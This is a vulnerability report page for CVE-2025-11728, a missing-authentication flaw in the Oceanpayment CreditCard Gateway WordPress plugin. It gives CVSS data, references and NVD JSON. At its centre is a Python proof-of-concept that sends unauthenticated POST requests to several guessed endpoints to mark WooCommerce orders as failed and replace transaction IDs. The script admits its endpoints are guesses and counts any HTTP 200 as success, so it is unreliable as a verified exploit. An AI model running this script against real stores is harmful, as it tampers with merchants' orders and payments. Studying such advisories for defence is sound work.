Security Vulnerability Report
CVE-2025-11728 CVSS 5.3 MEDIUM

Published: 2025-10-15 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

The Oceanpayment CreditCard Gateway plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'return_payment' and 'notice_payment' functions in all versions up to, and including, 6.0. This makes it possible for unauthenticated attackers to update WooCommerce orders to 'failed' status, and update transaction IDs.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Oceanpayment CreditCard Gateway for WordPress <= 6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11728 PoC - Oceanpayment CreditCard Gateway Unauthorized Data Modification
# This PoC demonstrates how an unauthenticated attacker can exploit
# the missing authentication checks on 'return_payment' and 'notice_payment' functions

import requests

# Target WordPress site using the vulnerable Oceanpayment CreditCard Gateway plugin
TARGET_URL = "http://target-wordpress-site.com"


def exploit_return_payment(order_id, transaction_id):
    """
    Exploit the 'return_payment' function to modify order status and transaction ID.
    This function is typically registered as a callback endpoint accessible without authentication.
    """
    # The return_payment callback is usually triggered via a GET/POST request
    # to a specific endpoint with order parameters
    payload = {
        'order_id': order_id,
        'transaction_id': transaction_id,
        'status': 'failed'
    }

    # Attempt to call the unprotected return_payment function
    # The endpoint may vary depending on plugin configuration
    endpoints = [
        f"{TARGET_URL}/?wc-api=return_payment",
        f"{TARGET_URL}/wp-admin/admin-post.php?action=return_payment",
        f"{TARGET_URL}/wp-json/oceanpayment/v1/return",
    ]

    for endpoint in endpoints:
        try:
            response = requests.post(endpoint, data=payload, timeout=10)
            if response.status_code == 200:
                print(f"[+] Successfully exploited: {endpoint}")
                print(f"[+] Order {order_id} status changed to 'failed'")
                print(f"[+] Transaction ID updated to: {transaction_id}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {endpoint}: {e}")

    return False


def exploit_notice_payment(order_id, transaction_id):
    """
    Exploit the 'notice_payment' function (async notification handler)
    to modify order data without authentication.
    """
    payload = {
        'order_id': order_id,
        'transaction_id': transaction_id,
        'payment_status': 'failed'
    }

    endpoints = [
        f"{TARGET_URL}/?wc-api=notice_payment",
        f"{TARGET_URL}/wp-admin/admin-post.php?action=notice_payment",
        f"{TARGET_URL}/wp-json/oceanpayment/v1/notice",
    ]

    for endpoint in endpoints:
        try:
            response = requests.post(endpoint, data=payload, timeout=10)
            if response.status_code == 200:
                print(f"[+] Successfully exploited: {endpoint}")
                print(f"[+] Order {order_id} modified via notice_payment")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {endpoint}: {e}")

    return False


if __name__ == "__main__":
    # Example: Target a specific WooCommerce order
    target_order_id = "12345"
    fake_transaction_id = "FAKE_TXN_999999"

    print("[*] CVE-2025-11728 - Oceanpayment CreditCard Gateway Exploit PoC")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Target Order ID: {target_order_id}")
    print("-" * 60)

    # Try exploiting return_payment function
    print("\n[*] Attempting to exploit 'return_payment' function...")
    exploit_return_payment(target_order_id, fake_transaction_id)

    # Try exploiting notice_payment function
    print("\n[*] Attempting to exploit 'notice_payment' function...")
    exploit_notice_payment(target_order_id, fake_transaction_id)

    print("\n[*] Exploit attempts completed.")

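References

https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L489
https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L594
https://www.wordfence.com/threat-intel/vulnerabilities/id/c560bc33-d664-433e-bfd9-e4fa1776bb76?source=cve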

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11728", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:43.307", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Oceanpayment CreditCard Gateway plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'return_payment' and 'notice_payment' functions in all versions up to, and including, 6.0. This makes it possible for unauthenticated attackers to update WooCommerce orders to 'failed' status, and update transaction IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L489", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/oceanpayment-creditcard-gateway/trunk/class-wc-oceancreditcard.php#L594", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c560bc33-d664-433e-bfd9-e4fa1776bb76?source=cve", "source": "[email protected]"}]}}